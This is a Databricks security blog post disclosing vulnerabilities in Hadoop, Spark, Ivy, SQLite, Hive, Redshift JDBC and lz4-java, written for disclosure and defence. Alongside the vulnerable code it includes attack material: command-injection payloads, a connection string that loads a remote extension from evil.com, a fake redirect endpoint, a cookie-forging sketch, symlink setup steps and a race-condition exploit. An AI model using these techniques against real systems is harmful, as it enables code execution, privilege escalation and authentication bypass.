Open Source Security at Databricks

The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby enhancing the overall security posture of both Databricks products and the broader open source ecosystem. This commitment is manifested through several key activities, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.

This blog will provide an overview of the technical details of some of the vulnerabilities that the team discovered.

CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability

Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also using gzip, and executes it. The issue lies in the fact that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands via the archive name, for example using shell metacharacters.

The vulnerable code can be found here.

untarCommand.append("cd '")
     .append(FileUtil.makeSecureShellPath(untarDir))
     .append("' && ")
     .append("tar -xf ");

if (gzipped) {
  untarCommand.append(" -)");  // gzip branch: tar reads the archive from a pipe set up earlier (not shown)
} else {
  untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();

Note that makeSecureShellPath only escapes single quotes but does not add any. There was some debate about the consequences of the issue for Hadoop itself, but since this is a publicly offered API, it ultimately warranted a fix. Databricks was invested in fixing this issue because Spark's unpack code leveraged the vulnerable code path.
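
To make the injection concrete, here is a minimal, self-contained sketch (not Hadoop code; the archive name and payload are hypothetical) showing how an unquoted archive path appended to a bash -c command line smuggles in a second command:

// Minimal sketch (not Hadoop code): an attacker-chosen archive name that is
// appended without quoting becomes part of the shell command line.
public class UntarInjectionSketch {
  public static void main(String[] args) {
    String untarDir = "/tmp/untar";                        // trusted destination directory
    String inFile = "/tmp/archive.tar; touch /tmp/pwned";  // hypothetical attacker-controlled name
    // Mirrors the vulnerable concatenation: inFile is not single-quoted.
    String cmd = "cd '" + untarDir + "' && tar -xf " + inFile;
    System.out.println(cmd);
    // Passed to: bash -c "cd '/tmp/untar' && tar -xf /tmp/archive.tar; touch /tmp/pwned"
    // Everything after ';' runs as its own command.
  }
}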

CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability

Apache Spark™ uses an API to map a given username to the set of groups it belongs to. One of the implementations, ShellBasedGroupsMappingProvider, leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing arbitrary command injection.

The vulnerable code could be found here.

  // shells out a "bash -c id -Gn username" to get user groups
  private def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)  // <== potential command injection!
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
  }

We had to figure out if this provider could be reached with untrusted user input, and found the following path:

  1. ShellBasedGroupsMappingProvider.getGroups
  2. Utils.getCurrentUserGroups
  3. SecurityManager.isUserInACL
  4. SecurityManager.checkUIViewPermissions
  5. HttpSecurityFilter.doFilter

Ironically, the Spark UI HTTP security filter could allow that code to be reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability from being triggered in a default configuration.
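
For illustration, here is a minimal sketch (in Java rather than Spark's Scala, with a hypothetical username value) of how an unescaped username turns the id invocation into two commands:

// Minimal sketch: the username is concatenated into a bash -c argument, so shell
// metacharacters inside it are interpreted by bash.
public class GroupsMappingInjectionSketch {
  public static void main(String[] args) {
    String username = "alice; touch /tmp/pwned";  // hypothetical doAs value with shell metacharacters
    String[] cmd = { "bash", "-c", "id -Gn " + username };
    // bash receives the single argument: id -Gn alice; touch /tmp/pwned
    // and runs "touch /tmp/pwned" as a second command.
    System.out.println(String.join(" ", cmd));
  }
}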

Apache Ivy unpacking “zip slip” directory traversal vulnerability

Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking didn’t check for “../” in the Zip entry names, allowing for a directory traversal type of attack, also known as “zip slip”.

The vulnerable code could be found here.

while (((entry = zip.getNextEntry()) != null)) {
    File f = new File(dest, entry.getName());  // <== no check on the name of the entry!
    Message.verbose("\t\texpanding " + entry.getName() + " to " + f);
    // create intermediary directories - sometimes zip don't add them
    File dirF = f.getParentFile();
    if (dirF != null) {
        dirF.mkdirs();
    }
    if (entry.isDirectory()) {
        f.mkdirs();
    } else {
        writeFile(zip, f);
    }
    f.setLastModified(entry.getTime());
}

This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.
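
For reference, here is a minimal sketch of the standard guard against this class of bug (illustrative only, not Ivy's actual fix): canonicalize each entry's destination and reject anything that escapes the extraction directory.

import java.io.File;
import java.io.IOException;

public class ZipSlipGuardSketch {
  // Resolve an entry name against the destination and reject anything that escapes it.
  static File safeEntryFile(File dest, String entryName) throws IOException {
    File f = new File(dest, entryName);
    String destPath = dest.getCanonicalPath() + File.separator;
    if (!f.getCanonicalPath().startsWith(destPath)) {
      throw new IOException("Blocked zip slip entry: " + entryName);
    }
    return f;
  }

  public static void main(String[] args) throws IOException {
    File dest = new File("/tmp/ivy-cache");
    System.out.println(safeEntryFile(dest, "module/artifact.jar"));   // allowed
    System.out.println(safeEntryFile(dest, "../../etc/cron.d/evil")); // rejected with an exception
  }
}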

CVE-2023-32697: SQLite JDBC driver remote code execution

The SQLite JDBC driver can be made to load a remote extension, due to predictable temporary file naming, when loading a remote database file using the jdbc:sqlite::resource prefix together with the enable_load_extension option, which enables extension loading.

The main issue is the use of the hashCode method to generate a temporary file name, without taking into account that hashCode produces the same output for the same string across JVMs. An attacker can therefore predict the output and, with it, the location of the downloaded file.

The vulnerable code can be found here.

String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable temporary file
File dbFile = new File(tempFolder, dbFileName);

While the issue can be triggered in one step, here is a breakdown for simplicity:

Using the following connection string: jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true

This results in the .so file being downloaded to a predictable location in the /tmp folder, from which it can later be loaded using: select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')
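
A minimal sketch of the predictability (treating the resource address as a plain string here for illustration; in the driver it is derived from the resource URL): String.hashCode() is deterministic across JVMs, so an attacker can compute the temporary file name offline.

// Minimal sketch: the temporary file name derives from hashCode(), which an
// attacker can compute offline for a known resource address.
public class PredictableTempNameSketch {
  public static void main(String[] args) {
    String resourceAddr = "http://evil.com/evil.so";  // hypothetical attacker-hosted extension
    String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode());
    // The same value is produced on every JVM, so the path below is predictable
    // and can be referenced in select load_extension(...).
    System.out.println("/tmp/" + dbFileName);
  }
}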

CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution

JDBC driver scrutiny has increased in the last few years, thanks to the work of researchers like pyn3rd, who have presented their work at security conferences worldwide, notably “Make JDBC Attack Brilliant Again.” This issue is a byproduct of that work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.

The core of the issue resides in the openBrowserWindow function that can be found here.

//Desktop is not supported, lets try to open the browser process
OsType os = getOperatingSystem();
switch (os) {
  case WINDOWS:
    Runtime.getRuntime()
        .exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
    break;
  case MAC:
    Runtime.getRuntime().exec("open " + ssoUri.toString());
    break;
  case LINUX:
    Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
    break;

This function will execute a command based on the redirect URI that could potentially be provided by an untrusted source.

To trigger the issue, one can specify a connection string such as jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true, which uses the browser authentication mechanism, together with an endpoint that returns a 302 and specifies a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoUri is a Java URI restricts the freedom that an attacker has over the crafted command line.
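
As a rough illustration only (the port, path, and Location value below are assumptions, not the exact behavior of the Hive driver), a malicious endpoint simply needs to answer the driver's browser-auth request with a 302 whose Location value ultimately lands in the exec call:

// Hypothetical sketch of a redirecting endpoint; not Hive code. The Location value
// ends up concatenated into Runtime.exec("xdg-open " + ssoUri) on the client side.
import com.sun.net.httpserver.HttpServer;
import java.net.InetSocketAddress;

public class FakeSsoEndpointSketch {
  public static void main(String[] args) throws Exception {
    HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
    server.createContext("/jdbc", exchange -> {
      exchange.getResponseHeaders().add("Location", "http://attacker.example/callback");
      exchange.getResponseHeaders().add("X-Hive-Client-Identifier", "client-1");
      exchange.sendResponseHeaders(302, -1);  // redirect that drives openBrowserWindow
      exchange.close();
    });
    server.start();
  }
}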

CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass

Spark’s ThriftHttpServlet can be made to accept a cookie as a way to authenticate a user. This behavior is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (its default value depends on the project, but some projects set it to true). The validateCookie function is used to verify the cookie and ultimately calls CookieSigner.verifyAndExtract. The issue is that on verification failure, an exception is raised that returns both the received signature and the expected valid one, allowing a user to send the request again with that valid signature.

The vulnerable code can be found here.

if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
  throw new IllegalArgumentException("Invalid sign, original = " + originalSignature +
    " current = " + currentSignature);  // <== output the actual expected signature!
}

Example output returned to the client:

java.lang.IllegalArgumentException: Invalid sign, original = AAAA current = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
    at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
    at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)
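
A minimal sketch of how the leak is abused (the cookie name and payload layout below are assumptions for illustration and differ across versions): parse the expected signature out of the error message and resend the same payload carrying it.

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class SignatureLeakSketch {
  public static void main(String[] args) {
    // Error message returned by the server for a cookie sent with a bogus signature.
    String error = "java.lang.IllegalArgumentException: Invalid sign, original = AAAA"
        + " current = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=";
    Matcher m = Pattern.compile("current = (\\S+)").matcher(error);
    if (m.find()) {
      String leakedSignature = m.group(1);
      // Resend the same cookie payload, now carrying the server-computed signature.
      // Cookie name and payload format here are hypothetical.
      String forgedCookie = "hive.server2.auth=cu=admin&s=" + leakedSignature;
      System.out.println(forgedCookie);
    }
  }
}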

Both Apache Hive and Apache Spark™ were vulnerable to this issue and have since been fixed in their respective projects.

The timeline for getting this issue fixed and published illustrates some of the difficulties encountered when reporting vulnerabilities to open source projects:

  • May 16, 2023: reported to [email protected]
  • May 17, 2023: acknowledged
  • Jun 9, 2023: requested update on the case
  • Jun 12, 2023: reply that this may be a security issue
  • Oct 16, 2023: requested an update on the case
  • Oct 17, 2023: reply that a patch can be applied to Spark, but the status on the Hive side is unclear
  • Nov 6, 2023: requested an update on the case
  • Dec 4, 2023: requested an update on the case after noticing that the issue is publicly fixed in Hive and Spark
  • Feb 7, 2024: requested an update on the case
  • Feb 23, 2024: release of Spark 3.5.1
  • Mar 5, 2024: requested an update on the case
  • Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark side
  • Mar 29, 2024: release of Hive 4.0.0
  • Apr 19, 2024: announcing that we will publish details of the issue since it’s been more than a year, with little to no updates from the relevant Apache PMCs

Redshift JDBC Arbitrary File Append

The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that enables database connectivity using the standard JDBC APIs provided in the Java Platform, Enterprise Edition. This driver allows any Java application, application server, or Java-enabled applet to access Redshift.

If the JDBC driver is used across a privilege boundary, an attacker can use the Redshift JDBC driver’s logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines and arbitrary characters, and can be used to elevate privileges.

In the connection URL, a “LogPath” variable can be used to supply the path in which log files should be stored.

This results in files such as “redshift_jdbc_connection_XX.log,” where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.

By using a controlled directory and symlinking to critical files, a user in our environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.

The source code for the Redshift JDBC logfile handling is available at the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225

To recreate this, create a directory in /tmp, such as “/tmp/logging.” Within this directory, create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the number increments each time the Redshift JDBC connector is used.

These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, which follows the symlink and appends the log contents to the target file.
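
The setup described above can be sketched as follows (the paths, the number of pre-created links, and the target file are illustrative assumptions; the actual log numbering is driver-dependent):

import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;
import java.nio.file.Paths;

public class RedshiftLogSymlinkSketch {
  public static void main(String[] args) throws Exception {
    Path logDir = Paths.get("/tmp/logging");
    Files.createDirectories(logDir);
    // Hypothetical file the attacker wants the driver to append to.
    Path target = Paths.get("/tmp/target-to-append-to");
    // Pre-create symlinks for the next few sequential connection log names.
    for (int i = 1; i <= 5; i++) {
      Path link = logDir.resolve(String.format("redshift_jdbc_connection_%d.log", i));
      if (!Files.exists(link, LinkOption.NOFOLLOW_LINKS)) {
        Files.createSymbolicLink(link, target);
      }
    }
    // A victim connection whose URL sets LogPath to /tmp/logging (with logging enabled)
    // then appends its log output to the symlink target.
  }
}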

LZ4 Java arbitrary file write privilege escalation

The lz4-java library (a Java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when a compiled library is dropped onto disk. Large Java applications such as Spark and Hadoop use this library heavily.

The following code demonstrates this vulnerability:

File tempLib = null;
File tempLibLock = null;
try {
  // Create the .lck file first to avoid a race condition
  // with other concurrently running Java processes using lz4-java.
  tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
  tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));
  // copy to tempLib
  try (FileOutputStream out = new FileOutputStream(tempLib)) {
    byte[] buf = new byte[4096];
    while (true) {
      int read = is.read(buf);
      if (read == -1) {
        break;
      }
      out.write(buf, 0, read);
    }
  }
  System.load(tempLib.getAbsolutePath());

As you can see, this code writes out a .so stored within the jar file to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant of the file with a .lck extension, presumably to prevent collisions with other processes using the library. However, this .lck file allows an attacker watching the directory to learn the library’s filename from the .lck creation, race the creation of the library file itself, and plant a symbolic link at that path pointing anywhere on the filesystem.

The ramifications of this are twofold. First, the attacker is able to overwrite any file on the system with the contents of this .so file, which may allow an unprivileged attacker to overwrite root-owned files. Second, the symlink can be swapped between the write and the load, causing the privileged process to load a custom shared object supplied by the attacker. If this library is used across a privilege boundary, this may grant an attacker code execution at an elevated privilege level.
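
A minimal sketch of the race from the attacker’s side (the watched directory and the symlink target are hypothetical): watch for new .lck files and immediately plant a symlink at the predicted library path.

import java.nio.file.FileAlreadyExistsException;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardWatchEventKinds;
import java.nio.file.WatchEvent;
import java.nio.file.WatchKey;
import java.nio.file.WatchService;

public class Lz4RaceSketch {
  public static void main(String[] args) throws Exception {
    Path tmp = Paths.get(System.getProperty("java.io.tmpdir"));
    Path target = Paths.get("/tmp/attacker-target");  // hypothetical file or library to hijack
    try (WatchService watcher = FileSystems.getDefault().newWatchService()) {
      tmp.register(watcher, StandardWatchEventKinds.ENTRY_CREATE);
      while (true) {
        WatchKey key = watcher.take();
        for (WatchEvent<?> event : key.pollEvents()) {
          String name = event.context().toString();
          if (name.startsWith("liblz4-java-") && name.endsWith(".lck")) {
            // Predict the library path: same name without the ".lck" suffix.
            Path predicted = tmp.resolve(name.substring(0, name.length() - ".lck".length()));
            try {
              Files.createSymbolicLink(predicted, target);  // win the race before the .so is written
            } catch (FileAlreadyExistsException ignored) {
              // lost the race for this one
            }
          }
        }
        key.reset();
      }
    }
  }
}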

Conclusion

At Databricks, we recognize that enhancing the security of the open source software we utilize is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security on our Security and Trust Center.


